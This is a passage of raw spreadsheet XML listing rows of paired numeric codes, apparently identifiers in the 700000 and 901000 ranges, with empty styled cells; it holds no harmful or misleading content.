      <c r="B1153" s="3">
        <v>901082</v>
      </c>
      <c r="D1153" s="5"/>
      <c r="E1153" s="3"/>
      <c r="F1153" s="1"/>
      <c r="H1153" s="1"/>
    </row>
    <row r="1154" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1154" s="5">
        <v>700555</v>
      </c>
      <c r="B1154" s="3">
        <v>901605</v>
      </c>
      <c r="D1154" s="5"/>
      <c r="E1154" s="3"/>
      <c r="F1154" s="1"/>
      <c r="H1154" s="1"/>
    </row>
    <row r="1155" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1155" s="5">
        <v>700555</v>
      </c>
      <c r="B1155" s="3">
        <v>901533</v>
      </c>
      <c r="D1155" s="5"/>
      <c r="E1155" s="3"/>
      <c r="F1155" s="1"/>
      <c r="H1155" s="1"/>
    </row>
    <row r="1156" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1156" s="5">
        <v>700555</v>
      </c>
      <c r="B1156" s="3">
        <v>901475</v>
      </c>
      <c r="D1156" s="5"/>
      <c r="E1156" s="3"/>
      <c r="F1156" s="1"/>
      <c r="H1156" s="1"/>
    </row>
    <row r="1157" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1157" s="5">
        <v>700555</v>
      </c>
      <c r="B1157" s="3">
        <v>901407</v>
      </c>
      <c r="D1157" s="5"/>
      <c r="E1157" s="3"/>
      <c r="F1157" s="1"/>
      <c r="H1157" s="1"/>
    </row>
    <row r="1158" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1158" s="5">
        <v>700555</v>
      </c>
      <c r="B1158" s="3">
        <v>901430</v>
      </c>
      <c r="D1158" s="5"/>
      <c r="E1158" s="3"/>
      <c r="F1158" s="1"/>
      <c r="H1158" s="1"/>
    </row>
    <row r="1159" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1159" s="5">
        <v>700555</v>
      </c>
      <c r="B1159" s="3">
        <v>901444</v>
      </c>
      <c r="D1159" s="5"/>
      <c r="E1159" s="3"/>
      <c r="F1159" s="1"/>
      <c r="H1159" s="1"/>
    </row>
    <row r="1160" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1160" s="5">
        <v>700555</v>
      </c>
      <c r="B1160" s="3">
        <v>901575</v>
      </c>
      <c r="D1160" s="5"/>
      <c r="E1160" s="3"/>
      <c r="F1160" s="1"/>
      <c r="H1160" s="1"/>
    </row>
    <row r="1161" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1161" s="5">
        <v>700555</v>
      </c>
      <c r="B1161" s="3">
        <v>901406</v>
      </c>
      <c r="D1161" s="5"/>
      <c r="E1161" s="3"/>
      <c r="F1161" s="1"/>
      <c r="H1161" s="1"/>
    </row>
    <row r="1162" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1162" s="5">
        <v>700555</v>
      </c>
      <c r="B1162" s="3">
        <v>901437</v>
      </c>
      <c r="D1162" s="5"/>
      <c r="E1162" s="3"/>
      <c r="F1162" s="1"/>
      <c r="H1162" s="1"/>
    </row>
    <row r="1163" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1163" s="5">
        <v>700555</v>
      </c>
      <c r="B1163" s="3">
        <v>901521</v>
      </c>
      <c r="D1163" s="5"/>
      <c r="E1163" s="3"/>
      <c r="F1163" s="1"/>
      <c r="H1163" s="1"/>
    </row>
    <row r="1164" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1164" s="5">
        <v>700555</v>
      </c>
      <c r="B1164" s="3">
        <v>901474</v>
      </c>
      <c r="D1164" s="5"/>
      <c r="E1164" s="3"/>
      <c r="F1164" s="1"/>
      <c r="H1164" s="1"/>
    </row>
    <row r="1165" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1165" s="5">
        <v>700555</v>
      </c>
      <c r="B1165" s="3">
        <v>901426</v>
      </c>
      <c r="D1165" s="5"/>
      <c r="E1165" s="3"/>
      <c r="F1165" s="1"/>
      <c r="H1165" s="1"/>
    </row>
    <row r="1166" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1166" s="5">
        <v>700107</v>
      </c>
      <c r="B1166" s="3">
        <v>901546.01</v>
      </c>
      <c r="D1166" s="5"/>
      <c r="E1166" s="3"/>
      <c r="F1166" s="1"/>
      <c r="H1166" s="1"/>
    </row>
    <row r="1167" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1167" s="5">
        <v>700107</v>
      </c>
      <c r="B1167" s="3">
        <v>901048.00300000003</v>
      </c>
      <c r="D1167" s="5"/>
      <c r="E1167" s="3"/>
      <c r="F1167" s="1"/>
      <c r="H1167" s="1"/>
    </row>
    <row r="1168" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1168" s="5">
        <v>700020</v>
      </c>
      <c r="B1168" s="3">
        <v>901110.00100000005</v>
      </c>
      <c r="D1168" s="5"/>
      <c r="E1168" s="3"/>
      <c r="F1168" s="1"/>
      <c r="H1168" s="1"/>
    </row>
    <row r="1169" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1169" s="5">
        <v>700020</v>
      </c>
      <c r="B1169" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D1169" s="5"/>
      <c r="E1169" s="3"/>
      <c r="F1169" s="1"/>
      <c r="H1169" s="1"/>
    </row>
    <row r="1170" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1170" s="5">
        <v>700020</v>
      </c>
      <c r="B1170" s="3">
        <v>901005</v>
      </c>
      <c r="D1170" s="5"/>
      <c r="E1170" s="3"/>
      <c r="F1170" s="1"/>
      <c r="H1170" s="1"/>
    </row>
    <row r="1171" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1171" s="5">
        <v>700020</v>
      </c>
      <c r="B1171" s="3">
        <v>901083</v>
      </c>
      <c r="D1171" s="5"/>
      <c r="E1171" s="3"/>
      <c r="F1171" s="1"/>
      <c r="H1171" s="1"/>
    </row>
    <row r="1172" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1172" s="5">
        <v>700020</v>
      </c>
      <c r="B1172" s="3">
        <v>901070.00600000005</v>
      </c>
      <c r="D1172" s="5"/>
      <c r="E1172" s="3"/>
      <c r="F1172" s="1"/>
      <c r="H1172" s="1"/>
    </row>
    <row r="1173" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1173" s="5">
        <v>700020</v>
      </c>
      <c r="B1173" s="3">
        <v>901105</v>
      </c>
      <c r="D1173" s="5"/>
      <c r="E1173" s="3"/>
      <c r="F1173" s="1"/>
      <c r="H1173" s="1"/>
    </row>
    <row r="1174" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1174" s="5">
        <v>700020</v>
      </c>
      <c r="B1174" s="3">
        <v>901046</v>
      </c>
      <c r="D1174" s="5"/>
      <c r="E1174" s="3"/>
      <c r="F1174" s="1"/>
      <c r="H1174" s="1"/>
    </row>
    <row r="1175" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1175" s="5">
        <v>700020</v>
      </c>
      <c r="B1175" s="3">
        <v>901027.00199999998</v>
      </c>
      <c r="D1175" s="5"/>
      <c r="E1175" s="3"/>
      <c r="F1175" s="1"/>
      <c r="H1175" s="1"/>
    </row>
    <row r="1176" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1176" s="5">
        <v>700020</v>
      </c>
      <c r="B1176" s="3">
        <v>901505.00300000003</v>
      </c>
      <c r="D1176" s="5"/>
      <c r="E1176" s="3"/>
      <c r="F1176" s="1"/>
      <c r="H1176" s="1"/>
    </row>
    <row r="1177" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1177" s="5">
        <v>700023</v>
      </c>
      <c r="B1177" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D1177" s="5"/>
      <c r="E1177" s="3"/>
      <c r="F1177" s="1"/>
      <c r="H1177" s="1"/>
    </row>
    <row r="1178" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1178" s="5">
        <v>700023</v>
      </c>
      <c r="B1178" s="3">
        <v>901071.00300000003</v>
      </c>
      <c r="D1178" s="5"/>
      <c r="E1178" s="3"/>
      <c r="F1178" s="1"/>
      <c r="H1178" s="1"/>
    </row>
    <row r="1179" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1179" s="5">
        <v>700023</v>
      </c>
      <c r="B1179" s="3">
        <v>901059</v>
      </c>
      <c r="D1179" s="5"/>
      <c r="E1179" s="3"/>
      <c r="F1179" s="1"/>
      <c r="H1179" s="1"/>
    </row>
    <row r="1180" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1180" s="5">
        <v>700023</v>
      </c>
      <c r="B1180" s="3">
        <v>901092</v>
      </c>
      <c r="D1180" s="5"/>
      <c r="E1180" s="3"/>
      <c r="F1180" s="1"/>
      <c r="H1180" s="1"/>
    </row>
    <row r="1181" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1181" s="5">
        <v>700023</v>
      </c>
      <c r="B1181" s="3">
        <v>901573.00100000005</v>
      </c>
      <c r="D1181" s="5"/>
      <c r="E1181" s="3"/>
      <c r="F1181" s="1"/>
      <c r="H1181" s="1"/>
    </row>
    <row r="1182" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1182" s="5">
        <v>700023</v>
      </c>
      <c r="B1182" s="3">
        <v>901573.00199999998</v>
      </c>
      <c r="D1182" s="5"/>
      <c r="E1182" s="3"/>
      <c r="F1182" s="1"/>
      <c r="H1182" s="1"/>
    </row>
    <row r="1183" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1183" s="5">
        <v>700023</v>
      </c>
      <c r="B1183" s="3">
        <v>901008</v>
      </c>
      <c r="D1183" s="5"/>
      <c r="E1183" s="3"/>
      <c r="F1183" s="1"/>
      <c r="H1183" s="1"/>
    </row>
    <row r="1184" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1184" s="5">
        <v>700023</v>
      </c>
      <c r="B1184" s="3">
        <v>901083</v>
      </c>
      <c r="D1184" s="5"/>
      <c r="E1184" s="3"/>
      <c r="F1184" s="1"/>
      <c r="H1184" s="1"/>
    </row>
    <row r="1185" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1185" s="5">
        <v>700023</v>
      </c>
      <c r="B1185" s="3">
        <v>901105</v>
      </c>
      <c r="D1185" s="5"/>
      <c r="E1185" s="3"/>
      <c r="F1185" s="1"/>
      <c r="H1185" s="1"/>
    </row>
    <row r="1186" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1186" s="5">
        <v>700023</v>
      </c>
      <c r="B1186" s="3">
        <v>901056.00100000005</v>
      </c>
      <c r="D1186" s="5"/>
      <c r="E1186" s="3"/>
      <c r="F1186" s="1"/>
      <c r="H1186" s="1"/>
    </row>
    <row r="1187" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1187" s="5">
        <v>700023</v>
      </c>
      <c r="B1187" s="3">
        <v>901112</v>
      </c>
      <c r="D1187" s="5"/>
      <c r="E1187" s="3"/>
      <c r="F1187" s="1"/>
      <c r="H1187" s="1"/>
    </row>
    <row r="1188" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1188" s="5">
        <v>700023</v>
      </c>
      <c r="B1188" s="3">
        <v>901090.00100000005</v>
      </c>
      <c r="D1188" s="5"/>
      <c r="E1188" s="3"/>
      <c r="F1188" s="1"/>
      <c r="H1188" s="1"/>
    </row>
    <row r="1189" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1189" s="5">
        <v>700023</v>
      </c>
      <c r="B1189" s="3">
        <v>901012</v>
      </c>
      <c r="D1189" s="5"/>
      <c r="E1189" s="3"/>
      <c r="F1189" s="1"/>
      <c r="H1189" s="1"/>
    </row>
    <row r="1190" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1190" s="5">
        <v>700023</v>
      </c>
      <c r="B1190" s="3">
        <v>901091</v>
      </c>
      <c r="D1190" s="5"/>
      <c r="E1190" s="3"/>
      <c r="F1190" s="1"/>
      <c r="H1190" s="1"/>
    </row>
    <row r="1191" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1191" s="5">
        <v>700023</v>
      </c>
      <c r="B1191" s="3">
        <v>901113</v>
      </c>
      <c r="D1191" s="5"/>
      <c r="E1191" s="3"/>
      <c r="F1191" s="1"/>
      <c r="H1191" s="1"/>
    </row>
    <row r="1192" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1192" s="5">
        <v>700023</v>
      </c>
      <c r="B1192" s="3">
        <v>901518.00100000005</v>
      </c>
      <c r="D1192" s="5"/>
      <c r="E1192" s="3"/>
      <c r="F1192" s="1"/>
      <c r="H1192" s="1"/>
    </row>
    <row r="1193" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1193" s="5">
        <v>700023</v>
      </c>
      <c r="B1193" s="3">
        <v>901497</v>
      </c>
      <c r="D1193" s="5"/>
      <c r="E1193" s="3"/>
      <c r="F1193" s="1"/>
      <c r="H1193" s="1"/>
    </row>
    <row r="1194" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1194" s="5">
        <v>700602</v>
      </c>
      <c r="B1194" s="3">
        <v>901449</v>
      </c>
      <c r="D1194" s="5"/>
      <c r="E1194" s="3"/>
      <c r="F1194" s="1"/>
      <c r="H1194" s="1"/>
    </row>
    <row r="1195" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1195" s="5">
        <v>700602</v>
      </c>
      <c r="B1195" s="3">
        <v>901450</v>
      </c>
      <c r="D1195" s="5"/>
      <c r="E1195" s="3"/>
      <c r="F1195" s="1"/>
      <c r="H1195" s="1"/>
    </row>
    <row r="1196" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1196" s="5">
        <v>700611</v>
      </c>
      <c r="B1196" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D1196" s="5"/>
      <c r="E1196" s="3"/>
      <c r="F1196" s="1"/>
      <c r="H1196" s="1"/>
    </row>
    <row r="1197" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1197" s="5">
        <v>700611</v>
      </c>
      <c r="B1197" s="3">
        <v>901486</v>
      </c>
      <c r="D1197" s="5"/>
      <c r="E1197" s="3"/>
      <c r="F1197" s="1"/>
      <c r="H1197" s="1"/>
    </row>
    <row r="1198" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1198" s="5">
        <v>700611</v>
      </c>
      <c r="B1198" s="3">
        <v>901140</v>
      </c>
      <c r="D1198" s="5"/>
      <c r="E1198" s="3"/>
      <c r="F1198" s="1"/>
      <c r="H1198" s="1"/>
    </row>
    <row r="1199" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1199" s="5">
        <v>700611</v>
      </c>
      <c r="B1199" s="3">
        <v>901083</v>
      </c>
      <c r="D1199" s="5"/>
      <c r="E1199" s="3"/>
      <c r="F1199" s="1"/>
      <c r="H1199" s="1"/>
    </row>
    <row r="1200" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1200" s="5">
        <v>700611</v>
      </c>
      <c r="B1200" s="3">
        <v>901562.00100000005</v>
      </c>
      <c r="D1200" s="5"/>
      <c r="E1200" s="3"/>
      <c r="F1200" s="1"/>
      <c r="H1200" s="1"/>
    </row>
    <row r="1201" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1201" s="5">
        <v>700611</v>
      </c>
      <c r="B1201" s="3">
        <v>901490</v>
      </c>
      <c r="D1201" s="5"/>
      <c r="E1201" s="3"/>
      <c r="F1201" s="1"/>
      <c r="H1201" s="1"/>
    </row>
    <row r="1202" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1202" s="5">
        <v>700611</v>
      </c>
      <c r="B1202" s="3">
        <v>901112</v>
      </c>
      <c r="D1202" s="5"/>
      <c r="E1202" s="3"/>
      <c r="F1202" s="1"/>
      <c r="H1202" s="1"/>
    </row>
    <row r="1203" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1203" s="5">
        <v>700611</v>
      </c>
      <c r="B1203" s="3">
        <v>901106</v>
      </c>
      <c r="D1203" s="5"/>
      <c r="E1203" s="3"/>
      <c r="F1203" s="1"/>
      <c r="H1203" s="1"/>
    </row>
    <row r="1204" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1204" s="5">
        <v>700611</v>
      </c>
      <c r="B1204" s="3">
        <v>901135</v>
      </c>
      <c r="D1204" s="5"/>
      <c r="E1204" s="3"/>
      <c r="F1204" s="1"/>
      <c r="H1204" s="1"/>
    </row>
    <row r="1205" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1205" s="5">
        <v>700611</v>
      </c>
      <c r="B1205" s="3">
        <v>901027.00199999998</v>
      </c>
      <c r="D1205" s="5"/>
      <c r="E1205" s="3"/>
      <c r="F1205" s="1"/>
      <c r="H1205" s="1"/>
    </row>
    <row r="1206" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1206" s="5">
        <v>700611</v>
      </c>
      <c r="B1206" s="3">
        <v>901057</v>
      </c>
      <c r="D1206" s="5"/>
      <c r="E1206" s="3"/>
      <c r="F1206" s="1"/>
      <c r="H1206" s="1"/>
    </row>
    <row r="1207" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1207" s="5">
        <v>700611</v>
      </c>
      <c r="B1207" s="3">
        <v>901489</v>
      </c>
      <c r="D1207" s="5"/>
      <c r="E1207" s="3"/>
      <c r="F1207" s="1"/>
      <c r="H1207" s="1"/>
    </row>
    <row r="1208" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1208" s="5">
        <v>700611</v>
      </c>
      <c r="B1208" s="3">
        <v>901218.00699999998</v>
      </c>
      <c r="D1208" s="5"/>
      <c r="E1208" s="3"/>
      <c r="F1208" s="1"/>
      <c r="H1208" s="1"/>
    </row>
    <row r="1209" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1209" s="5">
        <v>700611</v>
      </c>
      <c r="B1209" s="3">
        <v>901518.00100000005</v>
      </c>
      <c r="D1209" s="5"/>
      <c r="E1209" s="3"/>
      <c r="F1209" s="1"/>
      <c r="H1209" s="1"/>
    </row>
    <row r="1210" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1210" s="5">
        <v>700611</v>
      </c>
      <c r="B1210" s="3">
        <v>901553.00199999998</v>
      </c>
      <c r="D1210" s="5"/>
      <c r="E1210" s="3"/>
      <c r="F1210" s="1"/>
      <c r="H1210" s="1"/>
    </row>
    <row r="1211" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1211" s="5">
        <v>700611</v>
      </c>
      <c r="B1211" s="3">
        <v>901614.00100000005</v>
      </c>
      <c r="D1211" s="5"/>
      <c r="E1211" s="3"/>
      <c r="F1211" s="1"/>
      <c r="H1211" s="1"/>
    </row>
    <row r="1212" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1212" s="5">
        <v>700611</v>
      </c>
      <c r="B1212" s="3">
        <v>901497.00300000003</v>
      </c>
      <c r="D1212" s="5"/>
      <c r="E1212" s="3"/>
      <c r="F1212" s="1"/>
      <c r="H1212" s="1"/>
    </row>
    <row r="1213" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1213" s="5">
        <v>700054</v>
      </c>
      <c r="B1213" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D1213" s="5"/>
      <c r="E1213" s="3"/>
      <c r="F1213" s="1"/>
      <c r="H1213" s="1"/>
    </row>
    <row r="1214" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1214" s="5">
        <v>700054</v>
      </c>
      <c r="B1214" s="3">
        <v>901105</v>
      </c>
      <c r="D1214" s="5"/>
      <c r="E1214" s="3"/>
      <c r="F1214" s="1"/>
      <c r="H1214" s="1"/>
    </row>
    <row r="1215" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1215" s="5">
        <v>700054</v>
      </c>
      <c r="B1215" s="3">
        <v>901102.00199999998</v>
      </c>
      <c r="D1215" s="5"/>
      <c r="E1215" s="3"/>
      <c r="F1215" s="1"/>
      <c r="H1215" s="1"/>
    </row>
    <row r="1216" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1216" s="5">
        <v>700106</v>
      </c>
      <c r="B1216" s="3">
        <v>901083</v>
      </c>
      <c r="D1216" s="5"/>
      <c r="E1216" s="3"/>
      <c r="F1216" s="1"/>
      <c r="H1216" s="1"/>
    </row>
    <row r="1217" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1217" s="5">
        <v>700106</v>
      </c>
      <c r="B1217" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D1217" s="5"/>
      <c r="E1217" s="3"/>
      <c r="F1217" s="1"/>
      <c r="H1217" s="1"/>
    </row>
    <row r="1218" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1218" s="5">
        <v>700106</v>
      </c>
      <c r="B1218" s="3">
        <v>901105</v>
      </c>
      <c r="D1218" s="5"/>
      <c r="E1218" s="3"/>
      <c r="F1218" s="1"/>
      <c r="H1218" s="1"/>
    </row>
    <row r="1219" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1219" s="5">
        <v>700106</v>
      </c>
      <c r="B1219" s="3">
        <v>901570</v>
      </c>
      <c r="D1219" s="5"/>
      <c r="E1219" s="3"/>
      <c r="F1219" s="1"/>
      <c r="H1219" s="1"/>
    </row>
    <row r="1220" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1220" s="5">
        <v>700106</v>
      </c>
      <c r="B1220" s="3">
        <v>901082</v>
      </c>
      <c r="D1220" s="5"/>
      <c r="E1220" s="3"/>
      <c r="F1220" s="1"/>
      <c r="H1220" s="1"/>
    </row>
    <row r="1221" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1221" s="5">
        <v>700154</v>
      </c>
      <c r="B1221" s="3">
        <v>901548.00199999998</v>
      </c>
      <c r="D1221" s="5"/>
      <c r="E1221" s="3"/>
      <c r="F1221" s="1"/>
      <c r="H1221" s="1"/>
    </row>
    <row r="1222" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1222" s="5">
        <v>700154</v>
      </c>
      <c r="B1222" s="3">
        <v>901548.00300000003</v>
      </c>
      <c r="D1222" s="5"/>
      <c r="E1222" s="3"/>
      <c r="F1222" s="1"/>
      <c r="H1222" s="1"/>
    </row>
    <row r="1223" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1223" s="5">
        <v>700154</v>
      </c>
      <c r="B1223" s="3">
        <v>901134.00100000005</v>
      </c>
      <c r="D1223" s="5"/>
      <c r="E1223" s="3"/>
      <c r="F1223" s="1"/>
      <c r="H1223" s="1"/>
    </row>
    <row r="1224" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1224" s="5">
        <v>700154</v>
      </c>
      <c r="B1224" s="3">
        <v>901134.00300000003</v>
      </c>
      <c r="D1224" s="5"/>
      <c r="E1224" s="3"/>
      <c r="F1224" s="1"/>
      <c r="H1224" s="1"/>
    </row>
    <row r="1225" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1225" s="5">
        <v>700154</v>
      </c>
      <c r="B1225" s="3">
        <v>901134.00399999996</v>
      </c>
      <c r="D1225" s="5"/>
      <c r="E1225" s="3"/>
      <c r="F1225" s="1"/>
      <c r="H1225" s="1"/>
    </row>
    <row r="1226" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1226" s="5">
        <v>700154</v>
      </c>
      <c r="B1226" s="3">
        <v>901087.00199999998</v>
      </c>
      <c r="D1226" s="5"/>
      <c r="E1226" s="3"/>
      <c r="F1226" s="1"/>
      <c r="H1226" s="1"/>
    </row>
    <row r="1227" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1227" s="5">
        <v>700154</v>
      </c>
      <c r="B1227" s="3">
        <v>901071</v>
      </c>
      <c r="D1227" s="5"/>
      <c r="E1227" s="3"/>
      <c r="F1227" s="1"/>
      <c r="H1227" s="1"/>
    </row>
    <row r="1228" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1228" s="5">
        <v>700154</v>
      </c>
      <c r="B1228" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D1228" s="5"/>
      <c r="E1228" s="3"/>
      <c r="F1228" s="1"/>
      <c r="H1228" s="1"/>
    </row>
    <row r="1229" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1229" s="5">
        <v>700154</v>
      </c>
      <c r="B1229" s="3">
        <v>901071.00399999996</v>
      </c>
      <c r="D1229" s="5"/>
      <c r="E1229" s="3"/>
      <c r="F1229" s="1"/>
      <c r="H1229" s="1"/>
    </row>
    <row r="1230" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1230" s="5">
        <v>700154</v>
      </c>
      <c r="B1230" s="3">
        <v>901197</v>
      </c>
      <c r="D1230" s="5"/>
      <c r="E1230" s="3"/>
      <c r="F1230" s="1"/>
      <c r="H1230" s="1"/>
    </row>
    <row r="1231" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1231" s="5">
        <v>700154</v>
      </c>
      <c r="B1231" s="3">
        <v>901185</v>
      </c>
      <c r="D1231" s="5"/>
      <c r="E1231" s="3"/>
      <c r="F1231" s="1"/>
      <c r="H1231" s="1"/>
    </row>
    <row r="1232" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1232" s="5">
        <v>700154</v>
      </c>
      <c r="B1232" s="3">
        <v>901059.00100000005</v>
      </c>
      <c r="D1232" s="5"/>
      <c r="E1232" s="3"/>
      <c r="F1232" s="1"/>
      <c r="H1232" s="1"/>
    </row>
    <row r="1233" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1233" s="5">
        <v>700154</v>
      </c>
      <c r="B1233" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D1233" s="5"/>
      <c r="E1233" s="3"/>
      <c r="F1233" s="1"/>
      <c r="H1233" s="1"/>
    </row>
    <row r="1234" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1234" s="5">
        <v>700154</v>
      </c>
      <c r="B1234" s="3">
        <v>901059.005</v>
      </c>
      <c r="D1234" s="5"/>
      <c r="E1234" s="3"/>
      <c r="F1234" s="1"/>
      <c r="H1234" s="1"/>
    </row>
    <row r="1235" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1235" s="5">
        <v>700154</v>
      </c>
      <c r="B1235" s="3">
        <v>901059.00600000005</v>
      </c>
      <c r="D1235" s="5"/>
      <c r="E1235" s="3"/>
      <c r="F1235" s="1"/>
      <c r="H1235" s="1"/>
    </row>
    <row r="1236" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1236" s="5">
        <v>700154</v>
      </c>
      <c r="B1236" s="3">
        <v>901059.00699999998</v>
      </c>
      <c r="D1236" s="5"/>
      <c r="E1236" s="3"/>
      <c r="F1236" s="1"/>
      <c r="H1236" s="1"/>
    </row>
    <row r="1237" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1237" s="5">
        <v>700154</v>
      </c>
      <c r="B1237" s="3">
        <v>901543.00300000003</v>
      </c>
      <c r="D1237" s="5"/>
      <c r="E1237" s="3"/>
      <c r="F1237" s="1"/>
      <c r="H1237" s="1"/>
    </row>
    <row r="1238" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1238" s="5">
        <v>700154</v>
      </c>
      <c r="B1238" s="3">
        <v>901132.00100000005</v>
      </c>
      <c r="D1238" s="5"/>
      <c r="E1238" s="3"/>
      <c r="F1238" s="1"/>
      <c r="H1238" s="1"/>
    </row>
    <row r="1239" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1239" s="5">
        <v>700154</v>
      </c>
      <c r="B1239" s="3">
        <v>901005</v>
      </c>
      <c r="D1239" s="5"/>
      <c r="E1239" s="3"/>
      <c r="F1239" s="1"/>
      <c r="H1239" s="1"/>
    </row>
    <row r="1240" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1240" s="5">
        <v>700154</v>
      </c>
      <c r="B1240" s="3">
        <v>901001.00300000003</v>
      </c>
      <c r="D1240" s="5"/>
      <c r="E1240" s="3"/>
      <c r="F1240" s="1"/>
      <c r="H1240" s="1"/>
    </row>
    <row r="1241" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1241" s="5">
        <v>700154</v>
      </c>
      <c r="B1241" s="3">
        <v>901030</v>
      </c>
      <c r="D1241" s="5"/>
      <c r="E1241" s="3"/>
      <c r="F1241" s="1"/>
      <c r="H1241" s="1"/>
    </row>
    <row r="1242" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1242" s="5">
        <v>700154</v>
      </c>
      <c r="B1242" s="3">
        <v>901140</v>
      </c>
      <c r="D1242" s="5"/>
      <c r="E1242" s="3"/>
      <c r="F1242" s="1"/>
      <c r="H1242" s="1"/>
    </row>
    <row r="1243" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1243" s="5">
        <v>700154</v>
      </c>
      <c r="B1243" s="3">
        <v>901573.00100000005</v>
      </c>
      <c r="D1243" s="5"/>
      <c r="E1243" s="3"/>
      <c r="F1243" s="1"/>
      <c r="H1243" s="1"/>
    </row>
    <row r="1244" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1244" s="5">
        <v>700154</v>
      </c>
      <c r="B1244" s="3">
        <v>901573.00199999998</v>
      </c>
      <c r="D1244" s="5"/>
      <c r="E1244" s="3"/>
      <c r="F1244" s="1"/>
      <c r="H1244" s="1"/>
    </row>
    <row r="1245" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1245" s="5">
        <v>700154</v>
      </c>
      <c r="B1245" s="3">
        <v>901203</v>
      </c>
      <c r="D1245" s="5"/>
      <c r="E1245" s="3"/>
      <c r="F1245" s="1"/>
      <c r="H1245" s="1"/>
    </row>
    <row r="1246" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1246" s="5">
        <v>700154</v>
      </c>
      <c r="B1246" s="3">
        <v>901068</v>
      </c>
      <c r="D1246" s="5"/>
      <c r="E1246" s="3"/>
      <c r="F1246" s="1"/>
      <c r="H1246" s="1"/>
